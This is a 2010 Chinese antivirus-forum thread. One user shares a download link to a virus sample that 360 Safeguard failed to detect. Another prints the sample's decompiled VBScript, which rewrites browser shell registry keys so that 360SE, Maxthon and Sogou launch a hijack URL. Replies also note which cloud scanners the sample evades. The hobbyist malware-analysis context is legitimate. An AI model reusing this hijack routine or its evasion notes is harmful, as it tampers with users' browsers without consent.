查看: 3474|回复: 21
收起左侧

[分享] 360也有抽筋的时候

[复制链接]
zzirong
发表于 2010-10-23 15:52:42 | 显示全部楼层 |阅读模式
本帖最后由 zzirong 于 2010-10-23 15:54 编辑

卡饭又抽了,附件上传不了
提供网盘下载病毒样本:http://v4.u.115.com/file/t5de51290c

不知道为什么网盾可以查出来,360卫士却查不出来,运行之,360无反应,病毒成功启动


2010-10-23 15:49 上传
下载附件 (27.77 KB)



下载附件 (56.33 KB)






jefffire
头像被屏蔽
发表于 2010-10-23 15:57:58 | 显示全部楼层
本帖最后由 jefffire 于 2010-10-23 15:59 编辑

你这个病毒是开源的? 压根没加密
嘻嘻哈哈011
头像被屏蔽
发表于 2010-10-23 16:01:11 | 显示全部楼层
卡饭抽了,360也抽了——双抽啊?

哈哈。。。我这里下载不了,难道是我的RPWT?
zzirong
 楼主| 发表于 2010-10-23 16:03:04 | 显示全部楼层
回复 2楼 jefffire 的帖子

现在流行开源嘛
jinzijie
发表于 2010-10-23 16:09:23 | 显示全部楼层
本帖最后由 jinzijie 于 2010-10-23 16:26 编辑
jefffire 发表于 2010-10-23 15:57
你这个病毒是开源的? 压根没加密

的确很无语。。。

jefffire
头像被屏蔽
发表于 2010-10-23 16:38:57 | 显示全部楼层
jefffire
头像被屏蔽
发表于 2010-10-23 16:46:43 | 显示全部楼层
  1. Public Sub SetRegDefaultOpenUrl()   
  2. On Error Resume Next
  3.     dim url
  4.     url="http://www.59688.com/?my"
  5.     dim ie_temp_path
  6.     ie_temp_path=GetWebBrowserPath() '获取一个浏览器路径   
  7.     Set fso = CreateObject("Scripting.FileSystemObject")   
  8.     If not fso.FileExists(ie_temp_path) Then  '不存在则读取默认
  9.       ie_temp_path=iePath
  10.     End If
  11.     Set fso  = Nothing
  12.     Const HKEY_CLASSES_ROOT = &H80000000
  13.     strComputer = "."
  14.     Set StdOut = WScript.StdOut   
  15.     Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" & strComputer & "\root\default:StdRegProv")   
  16.    
  17.     strKeyPath = "HTTP\shell\360SE.exe\command"
  18.     kkbbzz1Name = ""
  19.    
  20.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
  21.     kkbbzz1Name,kkbbzz1
  22.    
  23.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
  24.         '写入值到节点
  25.         kkbbzz1Name = ""  
  26.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
  27.         oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
  28.     end if
  29.    
  30.     strKeyPath = "HTTP\shell\open\command"  
  31.     kkbbzz1Name = ""  
  32.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
  33.     kkbbzz1Name,kkbbzz1
  34.    
  35.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
  36.         '写入值到节点
  37.         kkbbzz1Name = ""  
  38.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
  39.         'oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
  40.     end if
  41.    
  42.     strKeyPath = "HTTP\shell\Maxthon2\command"
  43.     kkbbzz1Name = ""
  44.    
  45.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
  46.     kkbbzz1Name,kkbbzz1
  47.    
  48.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
  49.         '写入值到节点
  50.         kkbbzz1Name = ""  
  51.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
  52.         oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
  53.     end if
  54.    
  55.     strKeyPath = "HTTP\shell\SogouExplorer\command"
  56.     kkbbzz1Name = ""
  57.    
  58.     oReg.GetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,_   
  59.     kkbbzz1Name,kkbbzz1
  60.    
  61.     if kkbbzz1<>"" or instr(kkbbzz1,url)=0 then
  62.         '写入值到节点
  63.         kkbbzz1Name = ""  
  64.         kkbbzz1 = """" & ie_temp_path & """" & " " & url & " " & "%1"
  65.         oReg.SetExpandedStringValue HKEY_CLASSES_ROOT,strKeyPath,kkbbzz1Name,kkbbzz1  
  66.     end if
  67. End Sub
复制代码
有点意思

jefffire
头像被屏蔽
发表于 2010-10-23 18:27:38 | 显示全部楼层
zzirong 发表于 2010-10-23 15:52
卡饭又抽了,附件上传不了
提供网盘下载病毒样本:http://v4.u.115.com/file/t5de51290c

恭喜,过数字云,可牛云,金山云,NPE[:26:]   VBE果然是盲点
q4585406
发表于 2010-10-23 20:22:57 | 显示全部楼层
360卫士不支持压缩包扫描和脱壳的!而网盾是利用URL之类检测的。要测试就要测360杀毒,完整的查杀功能。
q4585406
发表于 2010-10-23 20:23:43 | 显示全部楼层
你可以解压后扫描试试看,不过程序加壳严重的话卫士是不管的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-25 11:26 , Processed in 0.134906 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表